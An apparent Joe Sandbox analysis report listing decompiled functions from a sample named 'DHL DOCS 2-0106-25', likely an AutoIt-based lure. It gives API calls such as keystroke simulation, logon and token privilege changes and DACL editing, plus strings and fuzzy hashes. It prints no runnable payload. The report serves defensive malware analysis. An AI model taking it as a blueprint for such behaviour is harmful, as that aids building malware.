RtlAllocateHeap.NTDLL(00000000,?,00281444,?,001CFDF5,?,?,001BA976,00000010,00281440,001B13FC,?,001B13C6,?,001B1129), ref: 001E3852

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1685ba3f24d223d4270ffe12dc088b4a8fe9b3b941bf5ad7e458d861f0c0da52
Instruction ID: 37986d45ab02f512525d6db0bef7f197783a817dd457db1f06b257dd64e3f7bc
Opcode Fuzzy Hash: 1685ba3f24d223d4270ffe12dc088b4a8fe9b3b941bf5ad7e458d861f0c0da52
Instruction Fuzzy Hash: 79E0E531101AA467D631266B9C0DF9F3748AB827B0F150326BC25935D0CB20DE0182E0

Function 001B4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00281418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001B4F6D

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 97cf5a9c32f17cf4391ceefe68fe8f01e30083b41ba2c2d244bf675950bdba36
Instruction ID: c5d2cd83cb5d4a116998cf237b675a55a89baa2c59b411c8e53a742953b3e977
Opcode Fuzzy Hash: 97cf5a9c32f17cf4391ceefe68fe8f01e30083b41ba2c2d244bf675950bdba36
Instruction Fuzzy Hash: 38F03971505752CFDB389F68E4948A2BBF4EF1432A320C97EE1EA83622C7319844DF50

Function 0021CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,001FEE51,00273630,00000002), ref: 0021CD26

Part of subcall function 0021CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0021CD19,?,?,?), ref: 0021CC59
Part of subcall function 0021CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0021CD19,?,?,?,?,001FEE51,00273630,00000002), ref: 0021CC6E
Part of subcall function 0021CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0021CD19,?,?,?,?,001FEE51,00273630,00000002), ref: 0021CC7A

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: File$Pointer$Write
String ID:
API String ID: 3847668363-0
Opcode ID: 0322834d608de64cbda97b31918de4dd2db6693debb80803f91f152060661d54
Instruction ID: aacafca61a7250e2ba01b37ab0dd03ced0865f4bd3ea406e7337c40ca917e009
Opcode Fuzzy Hash: 0322834d608de64cbda97b31918de4dd2db6693debb80803f91f152060661d54
Instruction Fuzzy Hash: 89E0307A400604EFC7219F4AE90089ABBF8FF95250720852FE95582110D3B1AA54DB60

Function 001B2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001B2DC4

Part of subcall function 001B6B57: _wcslen.LIBCMT ref: 001B6B6A

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 7e9e42eb15bf01b1316a94195a0ba471efa9baafc61cd1bdc06f0aae04c4c8ce
Instruction ID: 9d25dfdc24ef8ad71f323e8e3b2d3a5c1e00d12e205ff6d46086f655c124377d
Opcode Fuzzy Hash: 7e9e42eb15bf01b1316a94195a0ba471efa9baafc61cd1bdc06f0aae04c4c8ce
Instruction Fuzzy Hash: 24E0CD766011245BC710D2589C05FEA77EDDFC8790F040071FD09D7248DBA4AD848550

Function 001B2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 001B3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001B3908

Part of subcall function 001BD730: GetInputState.USER32 ref: 001BD807

SetCurrentDirectoryW.KERNEL32(?), ref: 001B2B6B

Part of subcall function 001B30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 001B314E

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 2d05587ffcd0a8a299609712872431a9e44ea73ad6f6bd7bfa0fa941786829b3
Instruction ID: 1e3294cca8ff2a63808ec35ae3de4d5954e508b8c5592af5094416b5823f360a
Opcode Fuzzy Hash: 2d05587ffcd0a8a299609712872431a9e44ea73ad6f6bd7bfa0fa941786829b3
Instruction Fuzzy Hash: 08E08C2630524806CA08BBB5B8A69EDB7599BF2355F40163EF152871A3DF248A6A8352

Function 001F039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,001F0704,?,?,00000000,?,001F0704,00000000,0000000C), ref: 001F03B7

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: cb67294304794444d14dc5f4a7eb5ae60803232daf87ca6b5561b73d693fa645
Instruction ID: 44a1792a312887e9a01f940c2e2618a939f4dd132a64c84fcb0ef7c2cbeb88fb
Opcode Fuzzy Hash: cb67294304794444d14dc5f4a7eb5ae60803232daf87ca6b5561b73d693fa645
Instruction Fuzzy Hash: 25D06C3204010DBBDF028F84ED06EDA3BAAFB48714F114000FE1C56020C732E821AB90

Function 001B1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 001B1CBC

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: bf13a7dcba54632051259e0bd53f03a86beb6b37a97f6032297389a60cb2723b
Instruction ID: e9d9842af276505a8adf7a67e48098f3cb32b913267532a902925235180de844
Opcode Fuzzy Hash: bf13a7dcba54632051259e0bd53f03a86beb6b37a97f6032297389a60cb2723b
Instruction Fuzzy Hash: F7C0483A282204AAE2188B84BC4EF547768A348B01F948001F60AA95E382A22820AB50

Function 0022744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 001B5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,001B949C,?,00008000), ref: 001B5773

GetLastError.KERNEL32(00000002,00000000), ref: 002276DE

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 91f9c61afbff248f505a74ec3531859247d4cfce5261389bad1da2fdec0f90f5
Instruction ID: c3a64d2bfffe069698cf184dbb516c2b376dfaa16a0774adcdb8a189ad527932
Opcode Fuzzy Hash: 91f9c61afbff248f505a74ec3531859247d4cfce5261389bad1da2fdec0f90f5
Instruction Fuzzy Hash: 4881E230218701AFCB14EF68D491BA9B7E5BFA9310F04456DF8865B3A2DB30ED55CB92

Function 001B6246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000000,001F24E0), ref: 001B6266

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: fc6205aeebc2a0d46603d7082c683b222c84a561d106a3074d8cc9c223c64022
Instruction ID: aedb24d9e09877384b0fd5a77ac054ff637f1c999465e5b46c4811ee81c70124
Opcode Fuzzy Hash: fc6205aeebc2a0d46603d7082c683b222c84a561d106a3074d8cc9c223c64022
Instruction Fuzzy Hash: 7BE0B675500B01CFD3355F1AE804452FBF5FFE17613214A6ED4E692660D3B458868F50

Function 01189BC8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01189BD9

Memory Dump Source

Source File: 00000000.00000002.1660351923.0000000001187000.00000040.00000020.00020000.00000000.sdmp, Offset: 01187000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1187000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 03dadd291da05ee06501cb3d7163e16846106dd1591cec4fd0bd70cb71b04ccc
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 03E0E67494010EDFDB00EFB4D54DAAD7BB4EF04301F104161FD01E2280DB319D508A62

Non-executed Functions

Function 00249576 Relevance: 75.9, APIs: 39, Strings: 4, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 001C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001C9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0024961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0024965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0024969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002496C9
SendMessageW.USER32 ref: 002496F2
GetKeyState.USER32(00000011), ref: 0024978B
GetKeyState.USER32(00000009), ref: 00249798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002497AE
GetKeyState.USER32(00000010), ref: 002497B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002497E9
SendMessageW.USER32 ref: 00249810
SendMessageW.USER32(?,00001030,?,00247E95), ref: 00249918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0024992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00249941
SetCapture.USER32(?), ref: 0024994A
ClientToScreen.USER32(?,?), ref: 002499AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002499BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002499D6
ReleaseCapture.USER32 ref: 002499E1
GetCursorPos.USER32(?), ref: 00249A19
ScreenToClient.USER32(?,?), ref: 00249A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00249A80
SendMessageW.USER32 ref: 00249AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00249AEB
SendMessageW.USER32 ref: 00249B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00249B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00249B4A
GetCursorPos.USER32(?), ref: 00249B68
ScreenToClient.USER32(?,?), ref: 00249B75
GetParent.USER32(?), ref: 00249B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00249BFA
SendMessageW.USER32 ref: 00249C2B
ClientToScreen.USER32(?,?), ref: 00249C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00249CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00249CDE
SendMessageW.USER32 ref: 00249D01
ClientToScreen.USER32(?,?), ref: 00249D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00249D82

Part of subcall function 001C9944: GetWindowLongW.USER32(?,000000EB), ref: 001C9952

GetWindowLongW.USER32(?,000000F0), ref: 00249E05

Strings

p#(, xrefs: 00249990
8], xrefs: 00249728, 00249894, 002498B7, 002498EF, 00249A3C, 00249BB7, 00249C5E, 00249C8E, 00249D2C, 00249D58, 00249DA1, 00249DF2, 00249E16, 00249E40
@GUI_DRAGID, xrefs: 0024997D
F, xrefs: 00249D07

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: 8]$@GUI_DRAGID$F$p#(
API String ID: 3429851547-3378991866
Opcode ID: 2b8346f5d565bc471c0754052f6aa4bff8024490adf9f74c15ba3f69e69f4af9
Instruction ID: b3a4315cb608b2bbb744361207f349644a88c8e218b296c104ae1d61cc7391e2
Opcode Fuzzy Hash: 2b8346f5d565bc471c0754052f6aa4bff8024490adf9f74c15ba3f69e69f4af9
Instruction Fuzzy Hash: 3E42BE34615202AFD729CF28DC48EABBBE9FF89310F114619F599872A1D771E8A0CF41

Function 00244873 Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 002448F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00244908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00244927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0024494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0024495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0024497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 002449AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 002449D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00244A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00244A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00244A7E
IsMenu.USER32(?), ref: 00244A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00244AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00244B20
GetWindowLongW.USER32(?,000000F0), ref: 00244B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00244BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00244C82
wsprintfW.USER32 ref: 00244CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00244CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00244CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00244D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00244D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00244D5A

Strings

8], xrefs: 0024489F
%d/%02d/%02d, xrefs: 00244CA8

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d$8]
API String ID: 4054740463-1903327180
Opcode ID: a9a9f07a5396fdf44ee465d0be133a1a1263cd5caf2ff145b893fa4d9d1f8d5b
Instruction ID: 5cc2c96bde0ca89cbab469207df487893442c865f27c2d0dbfbfde3f41be0e57
Opcode Fuzzy Hash: a9a9f07a5396fdf44ee465d0be133a1a1263cd5caf2ff145b893fa4d9d1f8d5b
Instruction Fuzzy Hash: 3D123531610215ABEB28AF28DC49FAE7BF8FF85710F104129F916EB2E1DB749951CB50

Function 001CF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 001CF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0020F474
IsIconic.USER32(00000000), ref: 0020F47D
ShowWindow.USER32(00000000,00000009), ref: 0020F48A
SetForegroundWindow.USER32(00000000), ref: 0020F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0020F4AA
GetCurrentThreadId.KERNEL32 ref: 0020F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0020F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0020F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0020F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0020F4DE
SetForegroundWindow.USER32(00000000), ref: 0020F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0020F4F6
keybd_event.USER32(00000012,00000000), ref: 0020F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0020F50B
keybd_event.USER32(00000012,00000000), ref: 0020F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0020F519
keybd_event.USER32(00000012,00000000), ref: 0020F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0020F528
keybd_event.USER32(00000012,00000000), ref: 0020F52D
SetForegroundWindow.USER32(00000000), ref: 0020F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0020F557

Strings

Shell_TrayWnd, xrefs: 0020F46F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: d9c3b3ccbe8cb774ef587d8cc91f236d0188acefe25429bf9ff4707041fb14c1
Instruction ID: 857176b30bed918bdd8b74e72dab862d580265dc4eb7a9e530a27bdee8b72922
Opcode Fuzzy Hash: d9c3b3ccbe8cb774ef587d8cc91f236d0188acefe25429bf9ff4707041fb14c1
Instruction Fuzzy Hash: 6A315075A91318BBEB706FB95C4AFBF7E6CEB45B50F210025FA04F61D1C6B06D10AA60

Function 00211201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 002116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0021170D
Part of subcall function 002116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0021173A
Part of subcall function 002116C3: GetLastError.KERNEL32 ref: 0021174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00211286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 002112A8
CloseHandle.KERNEL32(?), ref: 002112B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002112D1
GetProcessWindowStation.USER32 ref: 002112EA
SetProcessWindowStation.USER32(00000000), ref: 002112F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00211310

Part of subcall function 002110BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002111FC), ref: 002110D4
Part of subcall function 002110BF: CloseHandle.KERNEL32(?,?,002111FC), ref: 002110E9

Strings

default, xrefs: 0021130B
winsta0, xrefs: 002112CC
, xrefs: 0021125A
Z', xrefs: 00211392

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$Z'
API String ID: 22674027-1455465207
Opcode ID: cc5cfe3991d9bd62ca6441e398c2bc2f4dee8cbd972ff705b16597929c533694
Instruction ID: 7ac61cfbb4b1216b4973c7947c51779355949a4737bfa5cb04e9b32fc8402062
Opcode Fuzzy Hash: cc5cfe3991d9bd62ca6441e398c2bc2f4dee8cbd972ff705b16597929c533694
Instruction Fuzzy Hash: 2881C271910209AFDF209FA8DC49FEE7BFDEF15B04F144129FA11A61A0D77189A4CB61

Function 00210B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002110F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00211114
Part of subcall function 002110F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00210B9B,?,?,?), ref: 00211120
Part of subcall function 002110F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00210B9B,?,?,?), ref: 0021112F
Part of subcall function 002110F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00210B9B,?,?,?), ref: 00211136
Part of subcall function 002110F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0021114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00210BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00210C00
GetLengthSid.ADVAPI32(?), ref: 00210C17
GetAce.ADVAPI32(?,00000000,?), ref: 00210C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00210C6D
GetLengthSid.ADVAPI32(?), ref: 00210C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00210C8C
HeapAlloc.KERNEL32(00000000), ref: 00210C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00210CB4
CopySid.ADVAPI32(00000000), ref: 00210CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00210CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00210D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00210D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00210D45
HeapFree.KERNEL32(00000000), ref: 00210D4C
